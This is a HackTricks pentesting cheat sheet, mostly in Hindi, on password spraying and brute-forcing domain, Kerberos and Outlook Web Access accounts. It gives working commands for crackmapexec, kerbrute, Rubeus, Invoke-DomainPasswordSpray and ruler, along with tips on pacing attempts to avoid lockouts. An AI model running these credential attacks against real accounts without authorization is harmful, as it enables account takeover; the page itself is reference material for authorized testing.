Password Spraying / Brute Force

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

पासवर्ड स्प्रेइंग

जब आपने कई वैध उपयोगकर्ता नाम पाए हैं, तो आप प्रत्येक पाए गए उपयोगकर्ताओं के साथ सबसे सामान्य पासवर्ड (पर्यावरण की पासवर्ड नीति को ध्यान में रखें) की कोशिश कर सकते हैं। डिफ़ॉल्ट रूप से न्यूनतम पासवर्ड लंबाई 7 है।

सामान्य उपयोगकर्ता नामों की सूचियाँ भी उपयोगी हो सकती हैं: https://github.com/insidetrust/statistically-likely-usernames

ध्यान दें कि आप कुछ गलत पासवर्ड की कोशिश करने पर कुछ खातों को लॉकआउट कर सकते हैं (डिफ़ॉल्ट रूप से 10 से अधिक)।

पासवर्ड नीति प्राप्त करें

यदि आपके पास कुछ उपयोगकर्ता क्रेडेंशियल्स या डोमेन उपयोगकर्ता के रूप में शैली हो तो आप पासवर्ड नीति प्राप्त कर सकते हैं:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

लाभांवित करना लिनक्स से (या सभी से)

  • crackmapexec का उपयोग:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
  • kerbrute (Go) का उपयोग करें

# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
  • स्प्रे (आप लॉकआउट से बचने के लिए प्रयासों की संख्या दर्शा सकते हैं):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
  • kerbrute का उपयोग करें (python) - कभी-कभी काम नहीं करता है, इसलिए सिफारिश नहीं की जाती है

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
  • Metasploit के scanner/smb/smb_login मॉड्यूल के साथ:

  • rpcclient का उपयोग:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Windows से

  • Rubeus के संस्करण के साथ ब्रूट मॉड्यूल के साथ:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
  • Invoke-DomainPasswordSpray के साथ (यह डिफ़ॉल्ट रूप से डोमेन से उपयोगकर्ताओं को उत्पन्न कर सकता है और यह डोमेन से पासवर्ड नीति प्राप्त करेगा और इसके अनुसार प्रयासों की सीमा निर्धारित करेगा):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
Invoke-SprayEmptyPassword

ब्रूट फोर्स

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Outlook Web Access

आउटलुक के पासवर्ड स्प्रे करने के लिए कई टूल हैं।

इन टूल्स में से किसी का उपयोग करने के लिए, आपको एक उपयोगकर्ता सूची और एक पासवर्ड / स्प्रे करने के लिए एक छोटी सूची पासवर्ड की आवश्यकता है।

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

गूगल

ओक्टा

संदर्भ

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated